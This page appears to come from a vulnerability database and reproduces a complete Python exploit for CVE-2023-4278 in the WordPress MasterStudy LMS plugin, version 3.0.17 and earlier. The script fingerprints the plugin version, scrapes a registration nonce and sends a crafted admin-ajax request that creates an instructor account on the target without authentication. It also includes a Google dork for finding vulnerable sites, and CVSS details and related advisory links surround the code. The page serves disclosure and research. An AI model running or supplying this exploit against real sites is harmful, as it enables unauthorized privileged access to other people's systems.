Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtRevan Arifio1337DAY-ID-39102
HistoryOct 09, 2023 - 12:00 a.m.

Wordpress Masterstudy LMS Plugin - 3.0.17 - Unauthenticated Instructor Account Creation Exploit

2023-10-0900:00:00
Revan Arifio
0day.today
146
wordpress
plugin
masterstudy
lms
vulnerability
exploit
instructor
account
creation
unauthenticated
cve-2023-4278
privilege escalation
security

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

0.087 Low

EPSS

Percentile

94.5%

JSON
# Exploit Title:  Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Exploit Author: Revan Arifio
# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278

import requests
import os
import re
import time

banner = """
   _______      ________    ___   ___ ___  ____        _  _ ___ ______ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \      | || |__ \____  / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |  / / (_) |
 | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__   _/ /  / / > _ < 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |        | |/ /_ / / | (_) |
  \_____|   \/   |______|  |____|\___/____|____/         |_|____/_/   \___/ 
                                                                            
======================================================================================================
|| Title            : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation       ||
|| Author           : https://github.com/revan-ar                                                   ||
|| Vendor Homepage  : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/      ||
|| Support          : https://www.buymeacoffee.com/revan.ar                                         ||
======================================================================================================

"""


print(banner)

# get nonce
def get_nonce(target):
    open_target = requests.get("{}/user-public-account".format(target))
    search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
    if search_nonce[1] != None:
        return search_nonce[1]
    else:
        print("Failed when getting Nonce :p")



# privielege escalation
def privesc(target, nonce, username, password, email):

    req_data = {
        "user_login":"{}".format(username),
        "user_email":"{}".format(email),
        "user_password":"{}".format(password),
        "user_password_re":"{}".format(password),
        "become_instructor":True,
        "privacy_policy":True,
        "degree":"",
        "expertize":"",
        "auditory":"",
        "additional":[],
        "additional_instructors":[],
        "profile_default_fields_for_register":[],
        "redirect_page":"{}/user-account/".format(target)
        }

    start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)

    if start.status_code == 200:
        print("[+] Exploit Success !!")
    else:
        print("[+] Exploit Failed :p")



# URL target
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
int_version = plugin_version[1].replace(".", "")
time.sleep(1)

if int(int_version) < 3018:
    print("[+] Target is Vulnerable !!")
    # Credential
    email =  input("[+] Email: ")
    username =  input("[+] Username: ")
    password =  input("[+] Password: ")
    time.sleep(1)
    print("[+] Getting Nonce...")
    get_nonce = get_nonce(target)
    # Get Nonce
    if get_nonce != None:
        print("[+] Success Getting Nonce: {}".format(get_nonce))
        time.sleep(1)
        # Start PrivEsc
        privesc(target, get_nonce, username, password, email)
    # ----------------------------------
    
else:
    print("[+] Target is NOT Vulnerable :p")

Related

prion 1
packetstorm 1
cvelist 1
nvd 1
wpexploit 1
cve 1
wpvulndb 1
githubexploit 1
exploitdb 1
wordfence 1
prion
prion
Design/Logic Flaw
2023-09-11 20:15:00
packetstorm
packetstorm
WordPress Masterstudy LMS 3.0.17 Account Creation
2023-10-10 00:00:00
cvelist
cvelist
CVE-2023-4278 MasterStudy LMS < 3.0.18 - Unauthenticated Instructor Account Creation
2023-09-11 19:46:08
nvd
nvd
CVE-2023-4278
2023-09-11 20:15:11
wpexploit
wpexploit
MasterStudy LMS < 3.0.18 - Unauthenticated Instructor Account Creation
2023-08-21 00:00:00
cve
cve
CVE-2023-4278
2023-09-11 20:15:11
wpvulndb
wpvulndb
MasterStudy LMS < 3.0.18 - Unauthenticated Instructor Account Creation
2023-08-21 00:00:00
githubexploit
githubexploit
Exploit for CVE-2023-4278
2023-09-04 14:16:32
exploitdb
exploitdb
Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
2023-10-09 00:00:00
wordfence
wordfence
Wordfence Intelligence Weekly WordPress Vulnerability Report (August 21, 2023 to August 27, 2023)
2023-08-31 12:57:25

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

0.087 Low

EPSS

Percentile

94.5%

JSON
Related for 1337DAY-ID-39102
prion1packetstorm1cvelist1nvd1wpexploit1cve1wpvulndb1githubexploit1exploitdb1wordfence1